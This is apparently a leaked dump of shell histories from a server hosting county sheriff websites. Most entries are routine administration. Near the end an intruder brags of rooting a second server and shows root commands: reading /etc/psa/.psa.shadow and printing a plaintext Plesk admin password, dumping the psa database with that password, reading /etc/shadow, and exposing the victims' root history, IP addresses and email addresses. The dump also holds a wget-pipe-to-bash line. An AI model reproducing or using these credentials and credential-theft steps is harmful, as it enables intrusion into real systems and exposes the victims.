- less recaptcha.log
- less recaptchalib.php
- for i in $(cat recaptcha.log); do echo $i; done
- for i in $(cat recaptcha.log); do ls -al $i; done
- for i in $(cat recaptcha.log); do ls -al $i; done > perms.log
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done| wc -l
- wc -l perms.log
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $il cat
- recaptchalib.php > $i; done
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; cat
- recaptchalib.php > $i; done
- ll /var/www/vhosts/georgecountymssheriff.com/httpdocs/recaptchalib.php
- less /var/www/vhosts/randolphcountysheriff.org/httpdocs/recaptchalib.php
- cd /var/www/vhosts/crosscountysheriff.org/home
- ll
- cd Cross\ County/
- ll
- less parse_pcv.php
- ll
- vi test.txt
- ll
- less parse_pcv.php
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- top
- vi test.txt
- vi test.txt
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- cd images/
- ll
- cp *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- \cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- cd ..
- ll
- ll
- vi test.txt
- ll
- cd .
- cd ..
- ll
- less pop_update.txt
- cd /var/www/vhosts/stfranciscountysheriff.org/
- ll
- cd home/
- ll
- less check_population.php
- cd /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/
- pwd
- ll
- ll
- ll
- ll
- top
- ll
- ll
- cd ..
- l
- ll
- cd Cross\ County/
- ll
- less Jun
- ll
- ll
- ll
- cd ..
- ll
- vi check_population.php
- php check_population.php
- vi check_population.php
- php check_population.php
- cd Cross\ County/
- ll
- less Population.txt
- cd..
- cd ..
- php check_population.php
- php check_population.php > Cross\ County/test.txt
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- cd Cross\ County/
- ll
- vi test.txt
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- vi inmate_class.php
- vi inmate_class.php
- top
- top
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- top
- postqueue -p
- top
- cd /var/www/vhosts/johnsoncosheriff.com/home
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd export_backup/
- ll
- ll -rt
- cd ..
- ll
- cd Export/
- ll
- cd Images/
- ll
- ll -rt
- cd ..
- cd ..
- ll
- cd export_backup/
- ll
- cd ..
- ll
- less parse_roster.php
- ll
- cd export_backup/
- ll
- top
- crontab -l
- less
- /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://crosscountysheriff.org/warrants.php?find=all
- crontab -e
- crontab -l
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n cd
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrantsv=viewid=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all\nhttp://www.
- crosscountysheriff.org/index.php
- top
- lsof -p 20452
- kill 20452
- lsof -p 20452
- top
- lsof -p 32631
- kill 32631
- lsof -p
- lsof -p 32631
- top
- lsof -p 5852
- top
- su - mstapleton
- ll
- cd /var/www/vhosts/kansassheriffs.org/uploads/
- cd /var/www/vhosts/kansassheriffs.org/
- ll
- cd /httpdocs/
- cd /va
- cd /var/www/vhosts/kansassheriffs.org/httpdocs/
- ll
- cd /uploads/
- cd uploads/
- ll
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/uploads/
- ll
- ../
- ll
- cd ../
- ll
- chown -R root:root uploads/
- ll
- cd uploads/
- ll
- cd ../
- ll
- chown -R kssa2 uploads/
- ll
- chown -R kssa2:kssa2 uploads/
- ll
- logout
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
- ll
- cd ../
- ll
- cd httpdocs/
- ll
- rm -R httpdocs/
- cd ../
- ll
- rm -R httpdocs/
- y
- y
- y
- y
- y
- y
- y
- y
- ll
- cd httpdocs/
- ll
- cd /var/www/vhosts/kansassheriffs.org/httpdocs/
- ll
- crontab -e
- logout
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
- ll
- cd ../
- ll
- rm -f httpdocs/
- rm -R httpdocs/
- ll
- cd httpdocs/
- ll
- ../
- cd ../
- ll
- rm -r httpdocs/
- y
- y
- y
- y
- y
- y
- y
- y
- ll
- rm -R httpdocs/
- y
- ll
- logout
- crontab -l
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all
- cd /var/www/vhosts/howardcountysheriffar.com/
- ll
- cd httpdocs/
- ll
- ll
- cd ..
- cd home/
- ll
- touch test.txt
- vi test.txt
- ll
- vi test.txt
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php
- >/dev/null 2>&1
- ll
- yum info php
- w
- top
- ps -ef | grep httpd
- w
- w
- w
- top
- top
- ps -ef
- ps -ef
- w
- iostat
- top
- ps -ef | grep bp
- kill 6144
- top
- crontab -l
- ps -ef | grep imap
- cd /etc/
- w
- top
- ps -ef | grep php
- ls /etc/init.d
- chkconfig --list
- runlevel
- /etc/init.d/postfix restart
- bg
- ps -ef | grep bp
- date
- kill 31287
- top
- ps -ef
- /etc/init.d/postfix start
- ps -ef| grep imap
- ps -ef| grep post
- less /usr/local/psa/var/log/maillog
- mail jwiegand@bjmweb.com
- less /usr/local/psa/var/log/maillog
- mailq
- man bpbark
- top
- ps -ef | grep my
- ps -ef | grep mysql
- ps -ef | less
- top
- ps -ef | grep php
- cd
- ls
- cd bin/
- ls
- cd ../scripts/
- ls
- ./backup-now.sh
- top
- ps -ef
- top
- ps -ef | grep psa
- ps -ef |grep sp
- pkill spider
- ps -ef |grep sp
- kill 6624 6644 18573
- ps -ef |grep sp
- ps -ef |grep spider
- kill 11673 11717 18605
- ps -ef |grep spider
- top
- top
- nn
- cd /var/www/vhosts/
- ls
- cd jacksonsheriff.org/
- find . -name tiny_mce
- find . -name tinymce
- ls admin
- cd httpdocs/
- ls
- ls admin
- find .
- find .| less
- cd ../../crosscountysheriff.org/
- cd httpdocs/
- ls
- find . -name tiny\*
- less ./admin/tinymce/jscripts/tiny_mce/tiny_mce.js
- mv ./admin/config/functions/tiny_mce.php
- ./admin/config/functions/tiny_mce.php_bak
- mv ./admin/tinymce/jscripts/tiny_mce ./admin/tinymce/jscripts/tiny_mce_bak
- cp ~/tiny_mce.php ./admin/config/functions/tiny_mce.php
- cp -rv ~/tiny_mce ./admin/tinymce/jscripts/tiny_mce
- cd ../..
- find . -type d -name wp-admin
- pwd
- cd ../..
- cd www/vhosts/
- ls
- cd crosscountysheriff.org/
- ls
- cd httpdocs/admin/
- ls
- ll
- history
- ls
- ll tinymce/
- ls
- ll config/
- ll config/functions/
- cd config/functions/
- ll
- diff tiny_mce.php tiny_mce.php_bak
- ls
- mv tiny_mce.php tiny_mce.php_new
- mv tiny_mce.php_bak tiny_mce.php
- cd ../
- ls
- cd ..
- ls
- history
- cd tinymce/jscripts/
- ll
- mv tiny_mce tiny_mce_new
- mv tiny_mce_bak tiny_mce
- top
- lsof -p 9043
- kill 9043
- lsof -p 9043
- cd /var/log
- ls
- less rsnapshot
- less rsnapshot
- cd /var/www/vhosts/crosscountysheriff.org/
- cd statistics/
- ls
- less logs/access_log
- cd /var/www/vhosts/baxtercountysheriff.com/
- ls
- cd httpdocs/
- cd admin_dymin/
- ls
- find . -name ping.php
- ll
- cd /var/www/vhosts/stonecountymosheriff.com/
- ll
- cd httpdocs/
- ll
- cd ..
- cd home/
- ll
- cd export_backup/
- ll
- crontab -l
- crontab -e
- crontab -l
- cd /var/www/vhosts/stonecountymosheriff.com/
- cd home/
- ll
- cd export_backup/
- ll
- top
- cd /var/www/vhosts/jocomosheriff.org/
- ll
- cd home/
- ll
- cd Export/
- ll
- cd ../export_backup/
- ll
- cd ..
- ll
- vi parse_roster.php
- crontab -l
- vi /backup/johms_parse_log.txt
- ll
- less clean.php
- ll
- cd export_backup/
- ll
- rm -f RosterExport_2011_01* RosterExport_2011_02* RosterExport_2011_03*
- RosterExport_2011_04* RosterExport_2011_05*
- rm -f RosterExport_2011_01*
- rm -f RosterExport_2011_02*
- rm -f RosterExport_2011_03*
- rm -f RosterExport_2011_04*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_05_0*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_06*
- ll
- ll
- ll
- ll
- cd ..
- ll
- vi parse_roster.php
- ll
- ll
- ll
- cd Export/
- ll
- cd Images/
- ll
- *.txt
- ll | less
- ll
- cd ..
- ll
- cd ..
- ll
- less parse_roster.php
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- cd Export/Images/
- ll
- ll 1243376
- ll 1243376*
- ll 1*
- ll 124*
- ll 12433*
- cd ..
- ll
- cd ..
- ll
- less clean.php
- vi clean.php
- php clean.php
- vi clean.php
- php clean.php
- ll
- cd Export/Images/
- ll
- cd ..
- cd ..
- php clean.php
- ll
- php clean.php
- ll
- ll
- ll
- cd export_backup/
- ll
- less RosterExport_2011_07_
- ll
- ll
- cd ..
- ll
- vi parse_roster.php
- vi parse_roster.php
- ll
- cd export_backup/
- ll
- ll
- ll
- cd /backup/
- ll
- vi johms_parse_log.txt
- ll
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd Export/
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- cd Images/
- ll
- cd ..
- ll
- cp *.JPG Images/
- ll
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- cd ..
- cd export_backup/
- ll
- ll
- ll
- cd ..
- cd Export/
- ll
- cd Images/
- ll
- ll
- ll | less
- ll
- cd ..
- ll
- cd ..
- ll
- du -sh ./*
- vi clean.php
- php clean.php
- ll
- vi clean.php
- php clean.php
- ll
- du -sh ./*
- cd Export/
- ll
- cd ..
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php >>
- /backup/johms_parse_log.txt
- ll
- du -sh ./*
- ll
- cd export_backup/
- ll
- ll
- cd ..
- cd Export/Images/
- ll
- cd ../../
- ll
- php clean.php
- ll
- du -sh ./*
- ll
- ll
- du -sh ./*
- du -sh ./*
- du -sh ./*
- cd Export/
- ll
- cd Images/
- ll
- ll
- ll 1322055.JPG
- ll
- cd ../../
- ll
- php parse_roster.php
- ll
- cd Export/
- ll
- ll
- cd Images/
- ll
- cd ..
- ll
- ll
- du -sh
- du -sh ./*
- top
- ll
- cd ..
- du -sh ./*
- ll
- ll
- du -sh ./*
- du -sh ./*
- cd ~
- ll
- mkdir MASS_PASS
- ll
- cd MASS_PASS/
- ll
- vi masspass.php
- ll
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php
- vi masspass.php
- php masspass.php -p 12345
- php masspass.php -p12345
- vi masspass.php
- php masspass.php -p12345
- php masspass.php
- vi masspass.php
- php masspass.php
- php masspass.php -oe0d14a92 -n12345
- vi masspass.php
- php masspass.php -oe0d14a92 -n12345
- php masspass.php -oe0d14a92 -nY9BNtSeb
- vi masspass.php
- php masspass.php -oe0d14a92 -nY9BNtSeb
- php masspass.php
- vi masspass.php
- php masspass.php
- php masspass.php -n705ad48f3563c4c30d3fec8564b7636b
- -oa872c8327d9b4b3e3e1cf6b673c529b4
- php masspass.php
- ll
- php masspass.php
- vi masspass.php
- crontab -e
- top
- ll
- less sete.sh
- less tat\ E
- cd /var/www/vhosts/crosscountysheriff.org/home/
- ll
- cd Cross\ County/
- ll
- vi test.txt
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php >/dev/null 2>&1
- cd /var/www/vhosts/boonesheriff.com/home/
- ll
- vi test.txt
- ll
- cronatb -l
- crontab -l
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/parse_pcv.php >/dev/null 2>&1
- ll
- cd images/
- ll
- ll
- cd ..
- ll
- ls
- ls scripts/
- at 6:00 AM tomorrow
- postfix -q
- postfix -p
- postqueue -q
- postqueue -p
- cd /usr/local/ll
- cd /usr/local/psa/var/
- ll
- cd log
- ll
- less maillog
- grep 'status=' maillog | less
- grep 'status=deferred' maillog | less
- grep 'timed out while receiving the initial server greeting' maillog | less
- grep 'conversation with s2smtpout' maillog | less
- grep 'radams' maillog | less
- crontab -l
- grep 'conversation with s2smtpout' maillog | mail -s "Relay Server Issues"
- serverwatch@bjmweb.com
- grep 'linda@voltplastics.com' maillog | less
- cd ~
- ll
- ll
- less huh
- ll
- ll -rt
- cd MASS_PASS/
- ll
- php masspass.php
- php masspass.php -oY9BNtSeb -nYNw1rTxp
- php masspass.php
- php masspass.php -n10df020e5e24b80589b4b618b107055c
- -o705ad48f3563c4c30d3fec8564b7636b
- php masspass.php
- cd MASS_PASS/
- ll
- php masspass.php
- ll
- cd MASS_PASS/
- php masspass.php
- su - mstapleton
- cd /var/www/vhosts/
- ll
- cd cherokeecountyalsheriff.com/
- ll
- cd httpdocs/
- ll
- cd _newsite/
- ll
- cd ../
- ll
- chown -R ccsal:psacln _newsite/
- ll
- cd _newsite/
- ll
- exit
- cd /var/www/vhosts/cherokeecountyalsheriff.com/
- ll
- cd httpdocs/
- ll
- cd _n
- cd _newsite/
- ll
- cd controllers/
- ll
- cd ../
- ll
- chown -R ccsal:psacln controllers/
- chown -R ccsal:psacln helpers/
- chown -R ccsal:psacln model/
- chown -R ccsal:psacln views/
- ll
- exit
- # cat ~webdebt/.bash_history
- su -l root -c "wget -q -O - http://208.109.96.14/public/scripts/nbu_install.sh |
- bash -s 800384d4-e9bb-11de-a2ed-00114332b4ff"
- exit
- su root
- su
- ls
- cd var/
- ls
- cd www/vhosts/
- ls
- cd baxtercountysheriff.com/
- ls
- cd httpdocs
- ls
- mkdir httpdocs
- su -
- su -
- ls
- cd /var/www/vhosts/
- ls
- cd baxtercountysheriff.com/
- ls
- mkdir vhosts
- cd ..
- ls
- mkdir poop
- rm poop
- rm -rf poop
- ls
- cd 20jdpa
- cd 20jdpa.com/
- ls
- mkdir httpdocs
- ls
- mkdir httpdocs
- su
- cd /var/www/vhosts/
- ll
- cd 20jdpa.com/httpdocs/
- su
- su -
- mkdir cert
- exit
- su -
- su -
- exti
- exit
- su -
- su -
- su -
- su -
- exi
- exit
- ll
- cd ..
- cd
- ll
- cd
- /
- cd //
- ll
- su -
- exit
- su
- cd.
- ;;
- ll
- su root
- ll
- cd
- ll
- cd
- ll
- su
- su -
- cd .ssh
- lll
- ll
- ll -a
- less authorized_keys
- cd ~
- pwd
- exit
- ////////////////////////////////////////////////////////////////////////////////
- ON TO SERVER NUMBER TWO...
- ROOTING YOUR BOX ALL OVER AGAIN ... THANKS FOR COPYING OUR ROOTSHELLS OVER!
- ////////////////////////////////////////////////////////////////////////////////
- # id
- uid=0(root) gid=0(root) groups=48(apache),504(psaserv),506(psasb)
- # uname -a
- Linux ip-173-201-44-217.ip.secureserver.net 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9
- 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
- // GET THEIR NEW PLESK ROOT PASSWORD...
- # cat /etc/psa/.psa.shadow
- xP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/
- // GET THEIR NEW PASSWORDS... THANKS AGAIN PLESK FOR THE PLAINTEXTS
- # mysqldump -q -u admin -pxP7bhLwbSkNiHyWS9PpnCG/u1wMkKy2/ --databases psa
- --add-drop-table > newpasses.sql
- // JUST FOR FUN...
- # cat /etc/shadow
- // ROOT LOGGED IN... THEY ARE ON TO US... BUT CAN NEVER STOP US
- # w; ps -aux
- 16:00:00 up 3 days, 14:28, 2 users, load average: 0.04, 0.05, 0.08
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bjmsuper pts/0 mthm-static-67-2 09:42 6:10m 0.02s 0.25s sshd: bjmsuper
- root pts/1 mthm-static-67-2 Fri11 10:59 0.54s 0.54s -bash
- // LETS SEE HOW THEY ATTEMPTED TO SECURE THEIR NEW SERVER...
- # cat ~root/.bash_history
- ifconfig
- ping 10.0.0.1
- ping 10.0.0.254
- service sshd status
- service network restart
- service sshd restart
- service iptables restart
- service iptables stop
- service iptables start
- exit
- service iptables stop
- service psa start
- service psa status
- netstat -anp | less
- tcpdump not port ssh
- yum update -y
- date
- pwd
- mkdir htmldoc
- wget
- http://www.htmldoc.org/software.php?VERSION=1.8.27&FILE=htmldoc/1.8.27/htmldoc-1
- .8.27-source.tar.gz
- ls
- rm software.php\?VERSION\=1.8.27
- cd htmldoc/
- wget http://ftp.easysw.com/pub/htmldoc/1.8.27/htmldoc-1.8.27-source.tar.gz
- gunzip htmldoc-1.8.27-source.tar.gz
- tar -xvf htmldoc-1.8.27-source.tar
- cd htmldoc-1.8.27
- ./configure
- yum install gcc-c++
- make
- make install
- cd ..
- cd ..
- mkdir ImageMagick
- yum install tcl-devel libpng-devel libjpg-devel ghostscript-devel bzip2-devel
- freetype-devel libtiff-devel
- pwd
- cd ImageMagick/
- wget ftp://ftp.imagemagick.org/pub/ImageMagick/ImageMagick.tar.gz
- tar -xzvf ImageMagick.tar.gz
- cd ImageMagick-6.7.1-0/
- ls
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- yum install java-1.6.0-openjdk-devel.i386
- cd /usr/src/
- ls
- wget http://www.pdflib.com/binaries/PDFlib/705/PDFlib-Lite-7.0.5.tar.gz
- tar -xzpf PDFlib-Lite-7.0.5.tar.gz
- cd PDFlib-Lite-7.0.5
- ls
- ./configure -prefix=/usr/local
- make
- make install
- yum install php-pear
- pecl install pdflib
- cp /usr/local/lib/libpdf.so /usr/include/php/ext
- echo "[libpdf]" >> /etc/php.ini
- echo "extension=pdf.so" >> /etc/php.ini
- service httpd restart
- cd /etc
- ls php.ini
- vi php.ini
- vi php.ini
- service httpd restart
- cd
- cd ImageMagick/
- ls
- cd ImageMagick
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- ls
- cd ImageMagick-6.7.1-0/
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- yum install libjpeg-devel
- yum install tcl-devel
- yum install libpng-devel
- yum install ghostscript-devel
- yum install bzip2-devel
- yum install freetype-devel
- yum install libtiff-devel
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
- --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
- --with-jp2=yes --with-png=yes --with-tiff=yes
- make clean
- make
- make install
- cd .ssh/
- ll
- chown root:root authorized_keys2
- vi /etc/my.cnf
- service mysqld restart
- pkill mysql
- service mysqld restart
- ps -ef | grep my
- vi /etc/my.cnf
- service mysqld start
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ifconfig -a
- vi mapfile
- ifconfig -a
- /usr/local/psa/bin/reconfigurator.pl mapfile
- mv mapfile mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- mv mapfile mapfile88
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ll
- cat mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- vi mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- vi mapfile.old
- vi mapfile.old
- ls
- ifconfig -a
- ifconfig -a
- rm mapfile
- /usr/local/psa/bin/reconfigurator.pl mapfile.old
- /usr/local/psa/bin/reconfigurator.pl mapfile
- vi mapfile
- ls /etc/sysconfig/network-scripts/
- cd /etc/sysconfig/network-scripts/
- ls
- ls
- less ifcfg-eth0
- cd
- ls
- finder.pl /var/www/vhosts/
- finder.pl /var/www/vhosts/
- find /var/www/vhosts/
- less /var/log/rkhunter.log
- cd
- cd /var/www/vhosts/cityofgassville.org/
- ls
- cd httpsdocs/
- ls
- less index.html
- cd
- cd /var/www/vhosts/mostwantedwebsites.net/
- ll
- cd httpdocs/
- ls
- ll
- mkdir ../old
- mv access_log.processed _bak/ csv_for_lead_hill_change_log.php test/ ../old/
- ll
- telnet mail.cityofgassville.com 25
- ssh 173.201.44.1
- cd /var/www/vhosts/
- ls
- cd default/
- ll
- cd htdocs/
- ll
- vi index.html
- vi .htaccess
- cd ..
- cd ..
- ls
- cd mostwantedgovernmentwebsites.com
- ll
- cd httpdocs/
- ll
- find . -name \*bak\*
- find . -perm 777 -ls
- chown apache:apache ./uploads
- chmod 1755 uploads/
- ls admin
- find . -perm 777 -type f -exec chmod 644 {} \; -ls
- find uploads/ -ls
- ls
- ll
- ll api
- less api/index.php
- mkdir ../old
- find . -name \*bak\*
- find . -name \*bak\* -exec mv -vb {} ../old/ \;
- find . -name \*bak\*
- ls
- ll
- cd /var/www/vhosts/
- ls
- cd default/
- ll -a
- cd htdocs/
- ll
- vi .htaccess
- service httpd restart
- vi .htaccess
- service httpd restart
- ls
- ll
- tcpdump port 80
- tcpdump port 80 -n
- tcpdump port 80
- tcpdump port 80 -s 1500
- tcpdump port 80 -s 1500 -A
- tcpdump port 80 -s 1500 -A| less
- cd ../../
- cd mostwantedgovernmentwebsites.com/
- cd httpdocs/
- vi index.htm
- cd ../..
- cd ../
- cd -
- ls
- cd mostwantedwebsites.net/
- cd httpdocs/
- vi index.htm
- less ../statistics/logs/access_log
- ls
- pwd
- pwd
- cd ../../
- ls
- cd mostwantedgovernmentwebsites.com
- ls
- ll
- cd httpdocs/
- ll
- vi index.htm
- mv index.htm index.htm_bak
- vi index.htm
- less ../statistics/logs/access_log
- ls
- mv index.htm_bak index.htm
- cd ../../
- ls
- cd mostwantedwebsites.net/
- ls
- cd httpdocs/
- ls
- mv index.htm index.htm_bak
- mv index.htm_bak index.htm
- service httpd restart
- pwd
- less index.htm
- pwd
- pwd
- mv index.htm index.htm_bak
- ls
- cp case_study.htm index.htm
- less index.htm
- pwd
- mv index.htm_bak index.htm
- cd ..
- cd ..
- cd default/
- ll
- cd htdocs/
- vi .htaccess
- yum install jp2-devel
- yum list | less
- yum list | less
- yum install fontconfig-devel
- wget http://www.ipchicken.com -O /dev/stdout | less
- ssh 97.74.115.143
- ssh 97.74.115.143
- ssh 97.74.115.143
- cd /var/www/vhosts/
- ls
- cd baxtercountysheriff.com/
- less statistics/logs/access_log
- ls
- find . -ls | less
- find . -ls | less
- less httpsdocs/array_o_files.php
- ll httpsdocs/array_o_files.php
- find . -ls | less
- find . -type f -exec grep passthru {} \;
- find . -type f -exec grep passthru {} \; -print
- find . -ls | less
- find . -ls | mail -s 'Files' jwiegand@bjmweb.com
- mailq
- vi /etc/postfix/main.cf
- postfix reload
- postqueue -f
- mailq
- mailq
- mailq
- mailq
- mailq
- mailq
- telnet 208.109.80.210 25
- postqueue -f
- ls
- find . -ls | less
- mailq
- less /usr/bin/GET
- less /sbin/ifup
- cd
- ls
- finder.pl /
- cd /var/www/vhosts/
- ls
- cd boonesheriff.com/
- find . -ls | less
- rm -rf cgi-bin/
- find . -ls | less
- less httpdocs/home/check_population.php
- find . -ls | less
- cd httpsdocs/
- ls
- rm -rf test
- cd ../..
- ls
- cd cityofgassville.org/
- find . -ls | less
- cd httpdocs/
- ll
- chmod 755 ajax controllers model settings views
- ll
- find . -ls
- ls
- cd views
- ll
- chmod 755 *
- find . -mode 777
- find . -perms 777
- find . -perm 777
- find . -perm 777 -ls
- find . -perm 777 -type f
- find . -perm 777 -type f -ls
- find . -perm 777 -type f -exec chmod 644 {} \;
- find . -ls
- find . -perm 777 -type d -exec chmod 755 {} \;
- ll
- cd ..
- find . -perm 777 -ls
- ls
- ll
- find . -perm 777 -type d -exec chmod 755 {} \;
- find . -perm 777 -type f -exec chmod 644 {} \;
- ll
- cd ../..
- ll
- cd boonesheriff.com/
- ll
- find . -ls | less
- find . -ls | less
- find . -perm 777
- find . -perm 777 -ls
- cd httpdocs/uploads/
- ll
- find . -perm 777 -ls
